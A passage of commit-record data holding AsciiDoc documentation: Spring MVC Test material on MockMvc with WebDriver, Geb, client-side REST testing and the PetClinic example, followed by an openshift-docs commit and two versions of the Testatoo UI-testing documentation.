`CreateMessagePage` extends the\n`AbstractPage`. We won't go over the details of `AbstractPage`, but in summary it\ncontains common functionality for all of our pages. For example, if our application has\na navigational bar, global error messages, etc., this logic can be placed in a shared\nlocation.\n\n<2> The next thing you will notice is that we have a member variable for each of the\nparts of the HTML page that we are interested in. These are of type `WebElement`.\n``WebDriver``'s https:\/\/github.com\/SeleniumHQ\/selenium\/wiki\/PageFactory[PageFactory] allows\nus to remove a lot of code from the HtmlUnit version of `CreateMessagePage` by\nautomatically resolving each `WebElement`. The\nhttps:\/\/seleniumhq.github.io\/selenium\/docs\/api\/java\/org\/openqa\/selenium\/support\/PageFactory.html#initElements-org.openqa.selenium.WebDriver-java.lang.Class-[PageFactory#initElements(WebDriver,Class<T>)]\nmethod will automatically resolve each `WebElement` by using the field name and looking it\nup by the `id` or `name` of the element within the HTML page.\n\n<3> We can use the\nhttps:\/\/github.com\/SeleniumHQ\/selenium\/wiki\/PageFactory#making-the-example-work-using-annotations[@FindBy annotation]\nto override the default lookup behavior. Our example demonstrates how to use the `@FindBy`\nannotation to look up our submit button using a css selector, *input[type=submit]*.\n\nFinally, we can verify that a new message was created successfully. The following\nassertions use the https:\/\/code.google.com\/p\/fest\/[FEST assertion library].\n\n[source,java]\n----\nassertThat(viewMessagePage.getMessage()).isEqualTo(expectedMessage);\nassertThat(viewMessagePage.getSuccess()).isEqualTo(\"Successfully created a new message\");\n----\n\nWe can see that our `ViewMessagePage` allows us to interact with our custom domain\nmodel. 
For example, it exposes a method that returns a `Message` object.\n\n[source,java]\n----\npublic Message getMessage() throws ParseException {\n\tMessage message = new Message();\n\tmessage.setId(getId());\n\tmessage.setCreated(getCreated());\n\tmessage.setSummary(getSummary());\n\tmessage.setText(getText());\n\treturn message;\n}\n----\n\nWe can then leverage the rich domain objects in our assertions.\n\nLastly, don't forget to _close_ the `WebDriver` instance when the test is complete.\n\n[source,java]\n----\n@After\npublic void destroy() {\n\tif (driver != null) {\n\t\tdriver.close();\n\t}\n}\n----\n\nFor additional information on using WebDriver, refer to the Selenium\nhttps:\/\/github.com\/SeleniumHQ\/selenium\/wiki\/Getting-Started[WebDriver documentation].\n\n[[spring-mvc-test-server-htmlunit-webdriver-advanced-builder]]\n====== Advanced MockMvcHtmlUnitDriverBuilder\n\nIn the examples so far, we have used `MockMvcHtmlUnitDriverBuilder` in the simplest way\npossible, by building a `WebDriver` based on the `WebApplicationContext` loaded for us by\nthe Spring TestContext Framework. This approach is repeated here.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebDriver driver;\n\n@Before\npublic void setup() {\n\tdriver = MockMvcHtmlUnitDriverBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\nWe can also specify additional configuration options.\n\n[source,java]\n----\nWebDriver driver;\n\n@Before\npublic void setup() {\n\tdriver = MockMvcHtmlUnitDriverBuilder\n\t\t\/\/ demonstrates applying a MockMvcConfigurer (Spring Security)\n\t\t.webAppContextSetup(context, springSecurity())\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n}\n----\n\nAs an alternative, we can perform the exact same setup by configuring the `MockMvc`\ninstance separately and supplying it to the `MockMvcHtmlUnitDriverBuilder` as follows.\n\n[source,java]\n----\nMockMvc mockMvc = MockMvcBuilders\n\t\t.webAppContextSetup(context)\n\t\t.apply(springSecurity())\n\t\t.build();\n\ndriver = MockMvcHtmlUnitDriverBuilder\n\t\t.mockMvcSetup(mockMvc)\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n----\n\nThis is more verbose, but by building the `WebDriver` with a `MockMvc` instance we have\nthe full power of `MockMvc` at our fingertips.\n\n[TIP]\n====\nFor additional information on creating a `MockMvc` instance refer to\n<<spring-mvc-test-server-setup-options>>.\n====\n\n[[spring-mvc-test-server-htmlunit-geb]]\n===== MockMvc and Geb\n\nIn the previous section, we saw how to use `MockMvc` with `WebDriver`. In this section,\nwe will use http:\/\/www.gebish.org\/[Geb] to make our tests even Groovy-er.\n\n\n[[spring-mvc-test-server-htmlunit-geb-why]]\n====== Why Geb and MockMvc?\n\nGeb is backed by WebDriver, so it offers many of the\n<<spring-mvc-test-server-htmlunit-webdriver-why,same benefits>> that we get from\nWebDriver. 
However, Geb makes things even easier by taking care of some of the\nboilerplate code for us.\n\n[[spring-mvc-test-server-htmlunit-geb-setup]]\n====== MockMvc and Geb Setup\n\nWe can easily initialize a Geb `Browser` with a Selenium `WebDriver` that uses `MockMvc`\nas follows.\n\n[source,groovy]\n----\ndef setup() {\n\tbrowser.driver = MockMvcHtmlUnitDriverBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build()\n}\n----\n\n[NOTE]\n====\nThis is a simple example of using `MockMvcHtmlUnitDriverBuilder`.\nFor more advanced usage, refer to <<Advanced MockMvcHtmlUnitDriverBuilder>>\n====\n\nThis will ensure that any URL referencing `localhost` as the server will be directed to\nour `MockMvc` instance without the need for a real HTTP connection. Any other URL will be\nrequested using a network connection as normal. This allows us to easily test the use of\nCDNs.\n\n[[spring-mvc-test-server-htmlunit-geb-usage]]\n====== MockMvc and Geb Usage\n\nNow we can use Geb as we normally would, but without the need to deploy our\napplication to a Servlet container. For example, we can request the view to create\na message with the following:\n\n[source,groovy]\n----\nto CreateMessagePage\n----\n\nWe can then fill out the form and submit it to create a message.\n\n[source,groovy]\n----\nwhen:\nform.summary = expectedSummary\nform.text = expectedMessage\nsubmit.click(ViewMessagePage)\n----\n\nAny unrecognized method calls or property accesses\/references that are not found will be\nforwarded to the current page object. This removes a lot of the boilerplate code we needed\nwhen using WebDriver directly.\n\nAs with direct WebDriver usage, this improves on the design of our\n<<spring-mvc-test-server-htmlunit-mah-usage,HtmlUnit test>> by leveraging the _Page Object\nPattern_. As mentioned previously, we can use the Page Object Pattern with HtmlUnit and\nWebDriver, but it is even easier with Geb. Let's take a look at our new Groovy-based\n`CreateMessagePage` implementation.\n\n[source,groovy]\n----\nclass CreateMessagePage extends Page {\n\tstatic url = 'messages\/form'\n\tstatic at = { assert title == 'Messages : Create'; true }\n\tstatic content = {\n\t\tsubmit { $('input[type=submit]') }\n\t\tform { $('form') }\n\t\terrors(required:false) { $('label.error, .alert-error')?.text() }\n\t}\n}\n----\n\nThe first thing you will notice is that our `CreateMessagePage` extends `Page`. We won't\ngo over the details of `Page`, but in summary it contains common functionality for all of\nour pages. The next thing you will notice is that we define a URL in which this page can\nbe found. This allows us to navigate to the page as follows.\n\n[source,groovy]\n----\nto CreateMessagePage\n----\n\nWe also have an `at` closure that determines if we are at the specified page. It should return\n`true` if we are on the correct page. 
This is why we can assert that we are on the correct\npage as follows.\n\n[source,groovy]\n----\nthen:\nat CreateMessagePage\nerrors.contains('This field is required.')\n----\n\n[NOTE]\n====\nWe use an assertion in the closure, so that we can determine where things went wrong if\nwe were at the wrong page.\n====\n\nNext, we create a `content` closure that specifies all the areas of interest within the page.\nWe can use a\nhttp:\/\/www.gebish.org\/manual\/current\/#the-jquery-ish-navigator-api[jQuery-ish Navigator API]\nto select the content we are interested in.\n\nFinally, we can verify that a new message was created successfully.\n\n[source,groovy]\n----\nthen:\nat ViewMessagePage\nsuccess == 'Successfully created a new message'\nid\ndate\nsummary == expectedSummary\nmessage == expectedMessage\n----\n\nFor further details on how to get the most out of Geb, consult\nhttp:\/\/www.gebish.org\/manual\/current\/[The Book of Geb] user's manual.\n\n\n[[spring-mvc-test-client]]\n==== Client-Side REST Tests\nClient-side tests can be used to test code that internally uses the `RestTemplate`.\nThe idea is to declare expected requests and to provide \"stub\" responses so that\nyou can focus on testing the code in isolation, i.e. without running a server.\nHere is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tRestTemplate restTemplate = new RestTemplate();\n\n\tMockRestServiceServer mockServer = MockRestServiceServer.bindTo(restTemplate).build();\n\tmockServer.expect(requestTo(\"\/greeting\")).andRespond(withSuccess());\n\n\t\/\/ Test code that uses the above RestTemplate ...\n\n\tmockServer.verify();\n----\n\nIn the above example, `MockRestServiceServer`, the central class for client-side REST\ntests, configures the `RestTemplate` with a custom `ClientHttpRequestFactory` that\nasserts actual requests against expectations and returns \"stub\" responses. In this case\nwe expect a request to \"\/greeting\" and want to return a 200 response with\n\"text\/plain\" content. We could define additional expected requests and stub responses as\nneeded. When expected requests and stub responses are defined, the `RestTemplate` can be\nused in client-side code as usual. At the end of testing, `mockServer.verify()` can be\nused to verify that all expectations have been satisfied.\n\nBy default, requests are expected in the order in which expectations were declared.\nYou can set the `ignoreExpectOrder` option when building the server, in which case\nall expectations are checked (in order) to find a match for a given request. That\nmeans requests are allowed to come in any order. Here is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tserver = MockRestServiceServer.bindTo(restTemplate).ignoreExpectOrder(true).build();\n----\n\nEven with unordered requests, by default each request is allowed to execute only once.\nThe `expect` method provides an overloaded variant that accepts an `ExpectedCount`\nargument that specifies a count range, e.g. `once`, `manyTimes`, `max`, `min`,\n`between`, and so on. 
Here is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tRestTemplate restTemplate = new RestTemplate();\n\n\tMockRestServiceServer mockServer = MockRestServiceServer.bindTo(restTemplate).build();\n\tmockServer.expect(times(2), requestTo(\"\/foo\")).andRespond(withSuccess());\n\tmockServer.expect(times(3), requestTo(\"\/bar\")).andRespond(withSuccess());\n\n\t\/\/ ...\n\n\tmockServer.verify();\n----\n\nNote that when `ignoreExpectOrder` is not set (the default), and therefore requests\nare expected in order of declaration, then that order only applies to the first of\nany expected request. For example, if \"\/foo\" is expected 2 times followed by \"\/bar\"\n3 times, then there should be a request to \"\/foo\" before there is a request to \"\/bar\",\nbut aside from that subsequent \"\/foo\" and \"\/bar\" requests can come at any time.\n\nAs an alternative to all of the above, the client-side test support also provides a\n`ClientHttpRequestFactory` implementation that can be configured into a `RestTemplate`\nto bind it to a `MockMvc` instance. That allows processing requests using actual\nserver-side logic but without running a server. Here is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tMockMvc mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();\n\tthis.restTemplate = new RestTemplate(new MockMvcClientHttpRequestFactory(mockMvc));\n\n\t\/\/ Test code that uses the above RestTemplate ...\n----\n\n\n\n[[spring-mvc-test-client-static-imports]]\n===== Static Imports\nJust like with server-side tests, the fluent API for client-side tests requires a few\nstatic imports. Those are easy to find by searching __\"MockRest*\"__. Eclipse users\nshould add `\"MockRestRequestMatchers.{asterisk}\"` and `\"MockRestResponseCreators.{asterisk}\"`\nas \"favorite static members\" in the Eclipse preferences under\n__Java -> Editor -> Content Assist -> Favorites__.\nThat allows using content assist after typing the first character of the\nstatic method name. Other IDEs (e.g. IntelliJ) may not require any additional\nconfiguration. Just check the support for code completion on static members.\n\n[[spring-mvc-test-client-resources]]\n===== Further Examples of Client-side REST Tests\nSpring MVC Test's own tests include\nhttps:\/\/github.com\/spring-projects\/spring-framework\/tree\/master\/spring-test\/src\/test\/java\/org\/springframework\/test\/web\/client\/samples[example\ntests] of client-side REST tests.\n\n\n\n[[testing-examples-petclinic]]\n=== PetClinic Example\n\nThe PetClinic application, available on\nhttps:\/\/github.com\/spring-projects\/spring-petclinic[GitHub], illustrates several features\nof the __Spring TestContext Framework__ in a JUnit 4 environment. 
Most test functionality\nis included in the `AbstractClinicTests`, for which a partial listing is shown below:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport static org.junit.Assert.assertEquals;\n\t\/\/ import ...\n\n\t**@ContextConfiguration**\n\tpublic abstract class AbstractClinicTests **extends AbstractTransactionalJUnit4SpringContextTests** {\n\n\t\t**@Autowired**\n\t\tprotected Clinic clinic;\n\n\t\t@Test\n\t\tpublic void getVets() {\n\t\t\tCollection<Vet> vets = this.clinic.getVets();\n\t\t\tassertEquals(\"JDBC query must show the same number of vets\",\n\t\t\t\t**super.countRowsInTable(\"VETS\")**, vets.size());\n\t\t\tVet v1 = EntityUtils.getById(vets, Vet.class, 2);\n\t\t\tassertEquals(\"Leary\", v1.getLastName());\n\t\t\tassertEquals(1, v1.getNrOfSpecialties());\n\t\t\tassertEquals(\"radiology\", (v1.getSpecialties().get(0)).getName());\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n\nNotes:\n\n* This test case extends the `AbstractTransactionalJUnit4SpringContextTests` class, from\n which it inherits configuration for Dependency Injection (through the\n `DependencyInjectionTestExecutionListener`) and transactional behavior (through the\n `TransactionalTestExecutionListener`).\n* The `clinic` instance variable -- the application object being tested -- is set by\n Dependency Injection through `@Autowired` semantics.\n* The `getVets()` method illustrates how you can use the inherited `countRowsInTable()`\n method to easily verify the number of rows in a given table, thus verifying correct\n behavior of the application code being tested. This allows for stronger tests and\n lessens dependency on the exact test data. For example, you can add additional rows in\n the database without breaking tests.\n* Like many integration tests that use a database, most of the tests in\n `AbstractClinicTests` depend on a minimum amount of data already in the database before\n the test cases run. Alternatively, you might choose to populate the database within the\n test fixture set up of your test cases -- again, within the same transaction as the\n tests.\n\nThe PetClinic application supports three data access technologies: JDBC, Hibernate, and\nJPA. By declaring `@ContextConfiguration` without any specific resource locations, the\n`AbstractClinicTests` class will have its application context loaded from the default\nlocation, `AbstractClinicTests-context.xml`, which declares a common `DataSource`.\nSubclasses specify additional context locations that must declare a\n`PlatformTransactionManager` and a concrete implementation of `Clinic`.\n\nFor example, the Hibernate implementation of the PetClinic tests contains the following\nimplementation. For this example, `HibernateClinicTests` does not contain a single line\nof code: we only need to declare `@ContextConfiguration`, and the tests are inherited\nfrom `AbstractClinicTests`. 
Because `@ContextConfiguration` is declared without any\nspecific resource locations, the __Spring TestContext Framework__ loads an application\ncontext from all the beans defined in `AbstractClinicTests-context.xml` (i.e., the\ninherited locations) and `HibernateClinicTests-context.xml`, with\n`HibernateClinicTests-context.xml` possibly overriding beans defined in\n`AbstractClinicTests-context.xml`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**\n\tpublic class HibernateClinicTests extends AbstractClinicTests { }\n----\n\nIn a large-scale application, the Spring configuration is often split across multiple\nfiles. Consequently, configuration locations are typically specified in a common base\nclass for all application-specific integration tests. Such a base class may also add\nuseful instance variables -- populated by Dependency Injection, naturally -- such as a\n`SessionFactory` in the case of an application using Hibernate.\n\nAs far as possible, you should have exactly the same Spring configuration files in your\nintegration tests as in the deployed environment. One likely point of difference\nconcerns database connection pooling and transaction infrastructure. If you are\ndeploying to a full-blown application server, you will probably use its connection pool\n(available through JNDI) and JTA implementation. Thus in production you will use a\n`JndiObjectFactoryBean` or `<jee:jndi-lookup>` for the `DataSource` and\n`JtaTransactionManager`. JNDI and JTA will not be available in out-of-container\nintegration tests, so you should use a combination like the Commons DBCP\n`BasicDataSource` and `DataSourceTransactionManager` or `HibernateTransactionManager`\nfor them. You can factor out this variant behavior into a single XML file, having the\nchoice between application server and a 'local' configuration separated from all other\nconfiguration, which will not vary between the test and production environments. In\naddition, it is advisable to use properties files for connection settings. 
See the\nPetClinic application for an example.\n\n\n\n\n[[testing-resources]]\n== Further Resources\nConsult the following resources for more information about testing:\n\n* http:\/\/www.junit.org\/[JUnit]: \"__A programmer-oriented testing framework for Java__\".\n Used by the Spring Framework in its test suite.\n* http:\/\/testng.org\/[TestNG]: A testing framework inspired by JUnit with added support\n for annotations, test groups, data-driven testing, distributed testing, etc.\n* http:\/\/joel-costigliola.github.io\/assertj\/[AssertJ]: \"__Fluent assertions for Java__\"\n including support for Java 8 lambdas, streams, etc.\n* http:\/\/en.wikipedia.org\/wiki\/Mock_Object[Mock Objects]: Article in Wikipedia.\n* http:\/\/www.mockobjects.com\/[MockObjects.com]: Web site dedicated to mock objects, a\n technique for improving the design of code within test-driven development.\n* http:\/\/mockito.org\/[Mockito]: Java mock library based on the\n http:\/\/xunitpatterns.com\/Test%20Spy.html[test spy] pattern.\n* http:\/\/www.easymock.org\/[EasyMock]: Java library \"__that provides Mock Objects for\n interfaces (and objects through the class extension) by generating them on the fly\n using Java's proxy mechanism.__\" Used by the Spring Framework in its test suite.\n* http:\/\/www.jmock.org\/[JMock]: Library that supports test-driven development of Java\n code with mock objects.\n* http:\/\/dbunit.sourceforge.net\/[DbUnit]: JUnit extension (also usable with Ant and\n Maven) targeted for database-driven projects that, among other things, puts your\n database into a known state between test runs.\n* http:\/\/grinder.sourceforge.net\/[The Grinder]: Java load testing framework.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83ccc70b6d2fd53eab70f39cf5d88b80e04848bc","subject":"Prevent LD_PRELOAD error","message":"Prevent LD_PRELOAD error\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"creating_images\/guidelines.adoc","new_file":"creating_images\/guidelines.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4df8d32c8264a200df164bc4e355aeeec9e1eb53","subject":"Improve documentation","message":"Improve documentation\n","repos":"Ovea\/testatoo,Ovea\/testatoo","old_file":"testatoo-documentation\/doc\/testatoo.adoc","new_file":"testatoo-documentation\/doc\/testatoo.adoc","new_contents":"= Testatoo documentation\nv2.0, 2014\n:toc:\n:doctype: book\n:icons: font\n:homepage: https:\/\/github.com\/Ovea\/testatoo\n:desc: This is the documentation of Testatoo\n:testaoo-version: 2.0.b1\n\n:source-highlighter: highlightjs\n:imagesdir: images\n\nimage:logo.png[float=\"left\"]\n\n== Introduction\n\nTestatoo is a web user interface testing tool. It's the result of numerous real-world observations of developers in the trenches in the area of GUI testing.\nWorking for many years to promote the TDD approaches, we often faced difficulties in their implementation for the graphical layer of applications.\n\nThe \"test FIRST\" principle excludes all scenario recorder based approaches that only allow you to write a posteriori tests.\nOur experience has taught us that this path is a dead end (but we reserve this for another discussion...).\n\nAnother problem is UI tests are brittle and costly! 
We do think that this is due to the lack of abstraction in existing UI testing tools.\n\nTestatoo provides on one hand an abstraction of the UI business domain through an expressive API and on the other hand a way to express this domain via a DSL (a button semantically stays a button whatever the technology).\nWith Testatoo you can therefore write tests with a seldom achieved level of expressiveness and make these tests INDEPENDENT of the underlying technology.\n\nTestatoo can therefore transform tests into real assets, present throughout the life of the application and always in tune with the latest version of the application.\n\n== Technologies\n\nTestatoo is built on top of http:\/\/code.google.com\/p\/selenium\/[WebDriver], so it can work with any browser supported by https:\/\/code.google.com\/p\/selenium\/wiki\/FrequentlyAskedQuestions[WebDriver] (IE, Google-chrome, Firefox, ...).\nTestatoo provides, like http:\/\/www.gebish.org\/testing[geb], an extra layer of convenience and productivity, but it's always possible to \"fall back\" to the WebDriver level to do something directly should you need to.\nTestatoo also adds a powerful DSL while maintaining the usage of Groovy and keeps the advantage of a strongly typed language.\n\nExample of a test syntax :\n\n[source, groovy]\n-------------------------------------------------------------------------------\n assertThat textField has label('myLabel')\n assertThat textField has placeholder('My placeholder')\n assertThat textField is empty\n-------------------------------------------------------------------------------\n\n== Why should I use Testatoo\n\nIf you don't use Testatoo for your UI tests, it's like you're \"Knocking On Heaven's Door\".\n\n== Installation & Usage (I want to ride my bicycle)\n\nOne snippet of code is worth a thousand words.\nSo let's go...\n\nGet Testatoo and its dependency libraries via Maven...\n\n[source, xml]\n-------------------------------------------------------------------------------\n<dependency>\n <groupId>org.testatoo<\/groupId>\n <artifactId>testatoo-core<\/artifactId>\n <version>{testaoo-version}<\/version>\n <scope>test<\/scope>\n<\/dependency>\n<dependency>\n <groupId>junit<\/groupId>\n <artifactId>junit<\/artifactId>\n <version>4.11<\/version>\n <scope>test<\/scope>\n<\/dependency>\n<dependency>\n <groupId>org.seleniumhq.selenium<\/groupId>\n <artifactId>selenium-java<\/artifactId>\n <version>2.39.0<\/version>\n <scope>test<\/scope>\n<\/dependency>\n-------------------------------------------------------------------------------\n\nTestatoo works with existing popular unit test libraries like JUnit.\nIn our first test (BaseGoogleTest) we test a simple search on Google.\n\nThe test looks like :\n\n[source, groovy]\n-------------------------------------------------------------------------------\npackage starter\n\nimport org.junit.AfterClass\nimport org.junit.BeforeClass\nimport org.junit.Test\nimport org.junit.runner.RunWith\nimport org.junit.runners.JUnit4\nimport org.openqa.selenium.firefox.FirefoxDriver\nimport org.testatoo.core.Testatoo\nimport org.testatoo.core.component.Button\nimport org.testatoo.core.component.input.TextField\nimport org.testatoo.core.component.list.ListView\nimport org.testatoo.core.evaluator.webdriver.WebDriverEvaluator\n\nimport static org.testatoo.core.Testatoo.*\nimport static org.testatoo.core.input.Mouse.*\nimport static org.testatoo.core.property.Properties.*\nimport static org.testatoo.core.state.States.*\n\n@RunWith(JUnit4)\nclass BaseGoogleTest {\n\n @BeforeClass\n public static 
void setup() {\n Testatoo.evaluator = new WebDriverEvaluator(new FirefoxDriver())\n open 'http:\/\/www.google.com'\n }\n @AfterClass public static void tearDown() { evaluator.close() }\n\n @Test\n public void simple_test() {\n TextField searchField = $('#gbqfq') as TextField\n Button searchButton = $('#gbqfb') as Button\n ListView resultList = $('#rso') as ListView\n\n assertThat resultList is missing\n assertThat searchField is visible\n\n on searchField enter 'Testatoo'\n clickOn searchButton\n\n waitUntil {resultList.is visible}\n\n assertThat resultList.items[0] has value.containing('Testatoo')\n }\n\n}\n-------------------------------------------------------------------------------\n\nIf you run the test, it should perform a simple search on the Google search engine.\nSome interesting elements can be seen in this test :\n\nTestatoo works with strongly typed components:: Testatoo manipulates typed components like TextField, Button, ListView.\n The power of Testatoo is, on the one hand, to provide a rich list of components and, on the other, the possibility\n to easily create and compose your own component sets.\n\nTestatoo uses deferred evaluation:: As you can see, we instantiate a ListView even if the component is not available in the page.\n You can test if the component is missing.\n\nTestatoo DSL is very clean and functional:: Testatoo is based on a clear and powerful syntax.\nTestatoo code never refers to a technical layer:: Under no circumstances in this test does the underlying DOM technology transpire in our code.\n\n[NOTE]\n===============================\nAs a rule, when you create a test with Testatoo we recommend adding some default imports to facilitate automatic completion in your favorite IDE(A).\n\n[source, groovy]\n-------------------------------------------------------------------------------\n\nimport static org.testatoo.core.Testatoo.*\nimport static org.testatoo.core.input.Mouse.*\nimport static org.testatoo.core.property.Properties.*\nimport static org.testatoo.core.state.States.*\n\n-------------------------------------------------------------------------------\n===============================\n\n== Back to the future\n\nWell well well (My Michelle), as explained Testatoo is a library to write functional tests. Functional tests mean SPECIFICATION.\n\nAs a SPECIFIER I want to express my test (intention) BEFORE coding my UI. Suppose the intention is to have\na page with two radio buttons to select the gender (male or female). 
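\n\nThe `maleRadio` and `femaleRadio` referenced below are plain Testatoo components; once the page exists they could be declared with a minimal sketch like this (the `#male`\/`#female` ids and the `Radio` component type are assumptions made for the example):\n\n[source, groovy]\n-------------------------------------------------------------------------------\nRadio maleRadio = $('#male') as Radio\nRadio femaleRadio = $('#female') as Radio\n-------------------------------------------------------------------------------\n\n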
The test can be expressed like this :\n\n-------------------------------------------------------------------------------\nassert that the maleRadio is unchecked\nand it has label \"Male\"\n\nassert that the femaleRadio is unchecked\nand it has label \"Female\"\n\ncheck the maleRadio\nassert that the maleRadio is checked\nassert that the femaleRadio is unchecked\n\ncheck the femaleRadio\nassert that the femaleRadio is checked\nassert that the maleRadio is unchecked\n-------------------------------------------------------------------------------\n\nThe Testatoo syntax to express this specification is :\n\n[source, groovy]\n-------------------------------------------------------------------------------\nassertThat {\n maleRadio.is(unchecked) and maleRadio.has label('Male')\n femaleRadio.is(unchecked) and femaleRadio.has label('Female')\n}\n\ncheck maleRadio\nassertThat maleRadio is checked\nassertThat femaleRadio is unchecked\n\ncheck femaleRadio\nassertThat femaleRadio is checked\nassertThat maleRadio is unchecked\n-------------------------------------------------------------------------------\n\nPretty close, isn't it ;)\n\nTestatoo provides a DSL to write tests in a natural language that is easy to manipulate from a specification point of view.\nAs this is a high level language, it allows tests to be written before UI coding.\n\nYES, for the first time with Testatoo you can write UI functional tests FIRST (yeah, it's pretty cool)\n\n\n\n\n\n\n\n\n\n","old_contents":"= Testatoo documentation\nv2.0, 2014\n:toc:\n:doctype: book\n:icons: font\n:homepage: https:\/\/github.com\/Ovea\/testatoo\n:desc: This is the documentation of Testatoo\n:testaoo-version: 2.0.b1\n\n:source-highlighter: highlightjs\n:imagesdir: images\n\nimage:logo.png[float=\"left\"]\n\n== Introduction\n\nTestatoo is a web user interface testing tool. It's the result of numerous real-world observations of developers in the trenches in the area of GUI testing.\nWorking for many years to promote the TDD approaches, we often faced difficulties in their implementation for the graphical layer of applications.\n\nThe \"test FIRST\" principle excludes all scenario recorder based approaches that only allow you to write a posteriori tests.\nOur experience has taught us that this path is a dead end (but we reserve this for another discussion...).\n\nAnother problem is UI tests are brittle and costly! We do think that this is due to the lack of abstraction in existing UI testing tools.\n\nTestatoo provides on one hand an abstraction of the UI business domain through an expressive API and on the other hand a way to express this domain via a DSL (a button semantically stays a buttons whatever the technology).\nWith Testatoo you can therefore write tests with a seldom achieved level of expressiveness and make these tests INDEPENDENT of the underlying technology.\n\nTestatoo can therefore transform the test in real assets, present throughout the life of the application and always in tune with the latest version of the application.\n\n== Technologies\n\nTestatoo is built on top of http:\/\/code.google.com\/p\/selenium\/[WebDriver], it can work with any browser supported by https:\/\/code.google.com\/p\/selenium\/wiki\/FrequentlyAskedQuestions[WebDriver] (IE, Google-chrome, Firefox, ...).\nIf Testatoo provides, like http:\/\/www.gebish.org\/testing[geb], an extra layer of convenience and productivity. 
It's always possible to \"fallback\" to the WebDriver level to do something directly should you need to.\nBut Testatoo adds a powerful DSL while maintaining the usage of Groovy and keeps the advantage of a strong typed language.\n\nExample of a test syntax :\n\n[source, groovy]\n-------------------------------------------------------------------------------\n assertThat textField has label('myLabel')\n assertThat textField has placeholder('My placeholder')\n assertThat textField is empty\n-------------------------------------------------------------------------------\n\n== Why should I use Testatoo\n\nIf you don't use Testatoo for your UI tests it's like you \"Knocking On Heaven's Door\".\n\n== Installation & Usage (I want to ride my bicycle)\n\nOne snipet of code is worth a thousand words\nSo go ......\n\nGet Testatoo and dependencies libraries via Maven\u2026\n\n[source, xml]\n-------------------------------------------------------------------------------\n<dependency>\n <groupId>org.testatoo<\/groupId>\n <artifactId>testatoo-core<\/artifactId>\n <version>{testaoo-version}<\/version>\n <scope>test<\/scope>\n<\/dependency>\n<dependency>\n <groupId>junit<\/groupId>\n <artifactId>junit<\/artifactId>\n <version>4.11<\/version>\n <scope>test<\/scope>\n<\/dependency>\n<dependency>\n <groupId>org.seleniumhq.selenium<\/groupId>\n <artifactId>selenium-java<\/artifactId>\n <version>2.39.0<\/version>\n <scope>test<\/scope>\n<\/dependency>\n-------------------------------------------------------------------------------\n\nTestatoo work with existing popular unit test libraries like JUnit.\nIn our first test (BaseGoogleTest) we test a simple search on Google.\n\nThe test looks like :\n\n[source, groovy]\n-------------------------------------------------------------------------------\npackage starter\n\nimport org.junit.AfterClass\nimport org.junit.BeforeClass\nimport org.junit.Test\nimport org.junit.runner.RunWith\nimport org.junit.runners.JUnit4\nimport org.openqa.selenium.firefox.FirefoxDriver\nimport org.testatoo.core.Testatoo\nimport org.testatoo.core.component.Button\nimport org.testatoo.core.component.input.TextField\nimport org.testatoo.core.component.list.ListView\nimport org.testatoo.core.evaluator.webdriver.WebDriverEvaluator\n\nimport static org.testatoo.core.Testatoo.*\nimport static org.testatoo.core.input.Mouse.*\nimport static org.testatoo.core.property.Properties.*\nimport static org.testatoo.core.state.States.*\n\n@RunWith(JUnit4)\nclass BaseGoogleTest {\n\n @BeforeClass\n public static void setup() {\n Testatoo.evaluator = new WebDriverEvaluator(new FirefoxDriver())\n open 'http:\/\/www.google.com'\n }\n @AfterClass public static void tearDown() { evaluator.close() }\n\n @Test\n public void simple_test() {\n TextField searchField = $('#gbqfq') as TextField\n Button searchButton = $('#gbqfb') as Button\n ListView resultList = $('#rso') as ListView\n\n assertThat resultList is missing\n assertThat searchField is visible\n\n on searchField enter 'Testatoo'\n clickOn searchButton\n\n waitUntil {resultList.is visible}\n\n assertThat resultList.items[0] has value.containing('Testatoo')\n }\n\n}\n-------------------------------------------------------------------------------\n\nIf you run the test it should process a simple search on google engine.\nSome interesting element can be show in this test :\n\nTestatoo work with Strongly typed components:: Testatoo manipulate typed components like TextField, Button, ListView.\n The power of Testatoo is in one hand to provide a rich list of 
components and on the other one the possibility\n to easily create and compose your own components set.\n\nTestatoo use deferred evaluation:: As you can see we instantiate a ListView event if the component is not available in the page.\n You can test if the component is missing\n\nTestatoo DSL is very clean and functional:: Testatoo is based on a clear and powerful syntax.\nTestatoo code never refer to a technical layer:: Under no circumstances in this test the underline DOM technology transpire in our code.\n\n[NOTE]\n===============================\nAs a rule when you create a test with Testatoo we recommend to add some default import to facilitate the automatic completion on your favorite IDE(A).\n\n[source, groovy]\n-------------------------------------------------------------------------------\n\nimport static org.testatoo.core.Testatoo.*\nimport static org.testatoo.core.input.Mouse.*\nimport static org.testatoo.core.property.Properties.*\nimport static org.testatoo.core.state.States.*\n\n-------------------------------------------------------------------------------\n===============================\n\n== Back to the future\n\nWell well well (My Michelle), as explained Testatoo is library to write functional test. Functional test mean SPECIFICATION.\n\nAs a SPECIFIER I want to express my test (intention) BEFORE to code my UI. So if the intention is to have\na page with two radio buttons to select the gender (male or female). The test can be expressed like 